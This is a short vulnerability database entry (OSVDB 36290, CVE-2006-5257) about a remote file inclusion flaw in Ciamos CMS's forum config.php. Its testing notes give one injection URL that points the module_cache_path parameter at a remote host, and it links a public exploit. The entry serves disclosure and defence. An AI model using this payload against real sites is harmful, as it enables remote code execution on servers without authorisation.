Ciamos CMS modules/forum/include/config.php module_cache_path Variable Remote File Inclusion

2006-10-08T00:00:00
ID OSVDB:36290
Type osvdb
Reporter Kacper(kacper1964@yahoo.pl)
Modified 2006-10-08T00:00:00

Description

Manual Testing Notes

http://[target]/ciamos_path/modules/forum/include/config.php?module_cache_path='http://[target]'

References:

ISS X-Force ID: 29398 Generic Exploit URL: http://milw0rm.com/exploits/2489 CVE-2006-5257 Bugtraq ID: 20403